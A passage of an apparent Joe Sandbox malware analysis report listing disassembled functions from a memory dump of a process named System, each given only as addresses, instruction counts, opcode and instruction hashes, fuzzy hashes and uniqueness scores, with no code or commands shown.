                                                          • Opcode ID: ca7a64564512b22b1041ebae364c418aecda9e3215efd234cf9a6b59adb3c6f5
                                                          • Instruction ID: 973f39f51b1c691975ec3af25f1e75c9ed6c3578225678641ed2ed71ac24474e
                                                          • Opcode Fuzzy Hash: ca7a64564512b22b1041ebae364c418aecda9e3215efd234cf9a6b59adb3c6f5
                                                          • Instruction Fuzzy Hash: C3E09231B486074BD30ED9298A851A6B64BA7D1321764C33AC111CB2E9EC78A94A4641
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C35D1 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3882728f777a3242457fbd50cd8d87bcf24cfa20fb68a2e468bef4f0f79aa9d
                                                          • Instruction ID: ca070496952c33276c6a5fbf9c5926200f9c229c1ca330c211cb3218139d4982
                                                          • Opcode Fuzzy Hash: d3882728f777a3242457fbd50cd8d87bcf24cfa20fb68a2e468bef4f0f79aa9d
                                                          • Instruction Fuzzy Hash: EEE0DF71848301CBE310E664C885799B2A0FF50300F108539D1ABC23A2EBB4B5428780
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C6810 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8ed09d48279f89a44da6a7d879ba690aab46f78ff22a11577a6f363ecdbceed3
                                                          • Instruction ID: 3835dd4687e198bee6c0b272d01f808d5ea7ca01a8cd7785bb6867c63c1ee68f
                                                          • Opcode Fuzzy Hash: 8ed09d48279f89a44da6a7d879ba690aab46f78ff22a11577a6f363ecdbceed3
                                                          • Instruction Fuzzy Hash: DCE0DF30B0860B4BD309DA5DC6801A9768BE7E1320B24C332C125CB3EDFC78A9494680
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C1FD1 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 105a0f36c64cb4e87facda67543ad40fff80baa0753caf5f7339413f1104d3f0
                                                          • Instruction ID: fcc285ff8ffeb48662bb72047873dda4fa2e397ae3d86cd19a36416ef5625a3d
                                                          • Opcode Fuzzy Hash: 105a0f36c64cb4e87facda67543ad40fff80baa0753caf5f7339413f1104d3f0
                                                          • Instruction Fuzzy Hash: C1D0C226D0D84306FB38C05824022BC4F49CB49B60F18C27ACEAAD73E36C8C39834185
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C33D6 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47019774e4242b89c35eb72618880ca7ddeac83c61bca311747ce3ea9c00d84a
                                                          • Instruction ID: f26b6c6fcc559a228f6b17bb45c89631250b3615c6b886cb34c23cf2f1cd8e0b
                                                          • Opcode Fuzzy Hash: 47019774e4242b89c35eb72618880ca7ddeac83c61bca311747ce3ea9c00d84a
                                                          • Instruction Fuzzy Hash: 8DE08630A2C7414F930CDE18D8D1126B7E5EB98B04F10983DB4C7C77A1D970B8018642
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C2035 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4d80c0149e310900721b47e755ab0291be48dc72e38f859563b015df5446ad6
                                                          • Instruction ID: 48d8e6ff98f748759d1de5fe1c2864ff63a0495f2fd15594f0c5765c2c986d68
                                                          • Opcode Fuzzy Hash: f4d80c0149e310900721b47e755ab0291be48dc72e38f859563b015df5446ad6
                                                          • Instruction Fuzzy Hash: 05D0A713E0D8120BEB38D05C24522680746DB98B60F59C336DE6ED77E3AC4C2D8341C1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C68A5 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 99210c743a0cfaa71f9e4a2e768cc98b01382ac3e258f1b94509cbaaffe9b117
                                                          • Instruction ID: 9c8b50cf41b06a12f051df51785d85d7d76ca13debaf4d7fb5d77498e64b9c07
                                                          • Opcode Fuzzy Hash: 99210c743a0cfaa71f9e4a2e768cc98b01382ac3e258f1b94509cbaaffe9b117
                                                          • Instruction Fuzzy Hash: 58D05E20B1C40A07E669BF2880963BD90875FC4380F20C43FD01FC32E6CD6868020252
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C3B2E Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78a50c879e68f0753ec09682d1da8ef6077084e6e6d8a964d4130911a3afcccc
                                                          • Instruction ID: 79fd7f0c995c46869005875ff5af020107171b181199931b52a4a005f8af7353
                                                          • Opcode Fuzzy Hash: 78a50c879e68f0753ec09682d1da8ef6077084e6e6d8a964d4130911a3afcccc
                                                          • Instruction Fuzzy Hash: A8D0A931CAC2034AD31CBA304952531712AAF89310B60E47DE18B822E3EDBAF0428642
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C3444 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d85bfe9b637445126a4191a8297a2914880b13deb8ec0edd293068e368e1641
                                                          • Instruction ID: b42d47af76edb7c3ae7b6613411686f155f75356bf2140fda7a1a0cdb467c890
                                                          • Opcode Fuzzy Hash: 5d85bfe9b637445126a4191a8297a2914880b13deb8ec0edd293068e368e1641
                                                          • Instruction Fuzzy Hash: 2DD0A93253C28393D308FA1488425BA3714FB20348F20642EA14BCA6A2DA14A0428A07
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C39A6 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 268209eec25a4de14f852accf70ed16cae5b2aed0ad14c7150173627456d02ed
                                                          • Instruction ID: 34b270941fa26d5dfd73d9db54def034668b7007f0ea39935f66ef51d0d68219
                                                          • Opcode Fuzzy Hash: 268209eec25a4de14f852accf70ed16cae5b2aed0ad14c7150173627456d02ed
                                                          • Instruction Fuzzy Hash: 44C0123690820B87E2189A29484216072AAAB81200BA1913CE2A7C62E1EA39F8529641
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C2E79 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66f605357df00c6cc59abef83241bd908f82324c90709ffa4c5a6b7f912dba59
                                                          • Instruction ID: ed4a03b898d544db49061fe344f1222ea50244bf736d90971eed9875bff2e329
                                                          • Opcode Fuzzy Hash: 66f605357df00c6cc59abef83241bd908f82324c90709ffa4c5a6b7f912dba59
                                                          • Instruction Fuzzy Hash: DFC01230948103999318562C0D066247255DB85710729C175FA6FE63F28EB5F58285C5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C1FDA Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c02030f6bd6f338ac2990361d7b49e1e2c9c63f1bb1da88b931599e909c017c1
                                                          • Instruction ID: 7b83137a70687980891c904f17fa5c336d57bf79a28f8dd21a412737b17ba964
                                                          • Opcode Fuzzy Hash: c02030f6bd6f338ac2990361d7b49e1e2c9c63f1bb1da88b931599e909c017c1
                                                          • Instruction Fuzzy Hash: D3C08C35E0C5228F932D9820402222A54498B46700F2090BE8A0BE73E7DCA46E4287C9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C7213 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 782dfc54f56395082af90805f63c4d459640fefba7fde45531984b00a31a04bb
                                                          • Instruction ID: ab21c4826e50964a8d6dd544b07428120b7a6a70127667cdebdb8450b0526cf4
                                                          • Opcode Fuzzy Hash: 782dfc54f56395082af90805f63c4d459640fefba7fde45531984b00a31a04bb
                                                          • Instruction Fuzzy Hash: E8C02B93D0C40307D3D0C61C140233005C5F7E4340B048030A21EC73D3FD486C020280
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF9F09C3339 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.714185288.00007FF9F09C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F09C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_7ff9f09c0000_System.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fd39ff79cdc256b1dc982e5da9a5bd1f973d88dfed49709d0284e42a0839b0a
                                                          • Instruction ID: 95c927722768528f1adcdfd610fe4fcccb98711d96a189c4f244008dec7320d9
                                                          • Opcode Fuzzy Hash: 5fd39ff79cdc256b1dc982e5da9a5bd1f973d88dfed49709d0284e42a0839b0a
                                                          • Instruction Fuzzy Hash: B5C04C34B087068BE3599A1D444057572A5EF86715B20463CE2ABC27E1DE66F8869604
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%